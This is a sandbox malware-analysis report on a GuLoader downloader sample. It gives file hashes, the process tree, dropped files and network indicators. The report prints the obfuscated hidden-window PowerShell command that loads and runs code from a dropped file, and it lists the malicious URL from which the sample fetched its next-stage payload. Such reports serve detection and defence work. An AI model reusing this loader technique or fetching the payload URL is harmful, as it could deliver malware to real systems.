File name: 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398

Full analysis: https://app.any.run/tasks/19367816-2df2-4695-86fb-d1c751a429b4
Verdict: Malicious activity
Threats:

GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities.

Analysis date: December 04, 2024, 14:56:07
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
guloader
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5: DB4FB8E7AD15FB8AFF39F1FD3274840C
SHA1: C995F46A60B8B87D420DDAFD9524498A835105F5
SHA256: 900DA53F8F93633B3327162836A260D6F65BD97FC2A0C20CE5AF568FD644F398
SSDEEP: 24576:Pqyhk6tdkJM+OnS38bPI+HYlZszku5ijcsIL7etXolrFghSOqaFi2q:Pqyhk6tdkJM+OnSIPI+HYlZszkUijcsu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 420)
    • GULOADER has been detected

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)
    • GULOADER has been detected (YARA)

      • powershell.exe (PID: 420)
      • Fortyndende.exe (PID: 4308)
    • GULOADER SHELLCODE has been detected (YARA)

      • powershell.exe (PID: 420)
      • Fortyndende.exe (PID: 4308)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 420)
  • INFO

    • Checks supported languages

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)
    • Creates files or folders in the user directory

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)
    • Reads the computer name

      • 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID: 4504)
    • The executable file from the user directory is run by the Powershell process

      • Fortyndende.exe (PID: 4308)
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (42.2)
.exe | Win64 Executable (generic) (37.3)
.dll | Win32 Dynamic Link Library (generic) (8.8)
.exe | Win32 Executable (generic) (6)
.exe | Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2016:07:25 00:55:31+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 25088
InitializedDataSize: 3805696
UninitializedDataSize: 2048
EntryPoint: 0x327d
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 122
Monitored processes: 4
Malicious processes: 3
Suspicious processes: 0

Behavior graph

start
  900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe (PID 4504) #GULOADER, no specs
    powershell.exe (PID 420) #GULOADER
      conhost.exe (PID 936)
      fortyndende.exe (PID 4308) #GULOADER, no specs

Process information

PID: 420
CMD: powershell.exe -windowstyle hidden "$Intensives=Get-Content -raw 'C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\Caucuses.Gan16';$Barbituric=$Intensives.SubString(72990,3);.$Barbituric($Intensives) "
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 936
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 4308
CMD: "C:\Users\admin\AppData\Local\Temp\Fortyndende.exe"
Path: C:\Users\admin\AppData\Local\Temp\Fortyndende.exe
Parent process: powershell.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\users\admin\appdata\local\temp\fortyndende.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
PID: 4504
CMD: "C:\Users\admin\Desktop\900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe"
Path: C:\Users\admin\Desktop\900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
4294967295
Modules
Images
c:\users\admin\desktop\900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
Total events: 5 626
Read events: 5 626
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 1
Suspicious files: 6
Text files: 6
Unknown types: 0

Dropped files

PID | Process | Filename | Type
4504 | 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe | C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\menthadiene.cob | binary
  MD5: 32D15CF115A883849E7D68D20E260018
  SHA256: F02C72537DC221266B71FFAB59AE5597EA1E082E55DC666E16837739F2DD2C7C
4504 | 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe | C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\Caucuses.Gan16 | text
  MD5: 3C66F76F25B31F2CA93B2B8864F82E4B
  SHA256: B9FDB0D31C169B0059E86D35B606AAF555F9A4DFE6D6FAC4D562DFA5765414A7
4504 | 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\koleraepidemi.lnk | binary
  MD5: 90F7D7353FB96AF32B866D022B19454F
  SHA256: AB08AE5734F853B7C72F79ECD9493302ABE99E1F4189EB27E2A44485B921B716
420 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_sr1bd3yz.jf5.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4504 | 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe | C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\desexualisation.sav | binary
  MD5: 44B1E89488E4FA8853E0D007FD9F1622
  SHA256: 439B23D2B0398E078BD644E8B11BE483EE368E8D3A2E83D4F77CDE3765DC0BEE
4504 | 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe | C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\Mutts251.txt | text
  MD5: D020E4D2003E9A1D7FF540A92A3B5871
  SHA256: 5C8DE863779EDF0E85F9BA3F12C0A0835CAF3AC38D31A5F41214F0EE94690D30
4504 | 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe | C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Solfegevelse\ansatsstykkers.fol | binary
  MD5: 03117BE064FE3FA41C8EFC3F91C2B4D8
  SHA256: 858BF99BF9F054C3081ED5986287B2CB0B5BDB3A4C555CA8D352191D08B7084B
4504 | 900da53f8f93633b3327162836a260d6f65bd97fc2a0c20ce5af568fd644f398.exe | C:\Users\admin\AppData\Local\Flnseren\Farveinstallationsprogrammerne\Mustee\Segmentalize.Imp | binary
  MD5: F289E4AFEA7818510CB1CC15E09BAD1C
  SHA256: 0260ABF121A9218890B9596E1DA5EF7851EB77B5705E6F0F64F0455D48EA5DCA
420 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3wbel4ff.cv4.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
420 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5dg3leom.d30.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641
  SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
HTTP(S) requests: 7
TCP/UDP connections: 20
DNS requests: 7
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
4308 | Fortyndende.exe | GET | | 50.6.194.42:80 | http://crstvda.com/PYQSW82.bin | unknown | | | unknown
4308 | Fortyndende.exe | GET | | 50.6.194.42:80 | http://crstvda.com/PYQSW82.bin | unknown | | | unknown
4712 | MoUsoCoreWorker.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | unknown
5736 | svchost.exe | GET | 200 | 88.221.169.152:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | | | unknown
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | | | unknown
5736 | svchost.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | | | unknown
4308 | Fortyndende.exe | GET | | 50.6.194.42:80 | http://crstvda.com/PYQSW82.bin | unknown | | | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | unknown
4712 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
5736 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
| | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown
4 | System | 192.168.100.255:138 | | | | unknown
5736 | svchost.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
4712 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | unknown
5736 | svchost.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | unknown
4712 | MoUsoCoreWorker.exe | 88.221.169.152:80 | www.microsoft.com | AKAMAI-AS | DE | unknown
4712 | MoUsoCoreWorker.exe | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 20.73.194.208, 51.124.78.146 | unknown
google.com | 216.58.212.174 | unknown
crl.microsoft.com | 2.16.241.12, 2.16.241.19 | unknown
www.microsoft.com | 88.221.169.152 | unknown
crstvda.com | 50.6.194.42 | unknown
self.events.data.microsoft.com | 20.189.173.25 | unknown

Threats

No threats detected
No debug info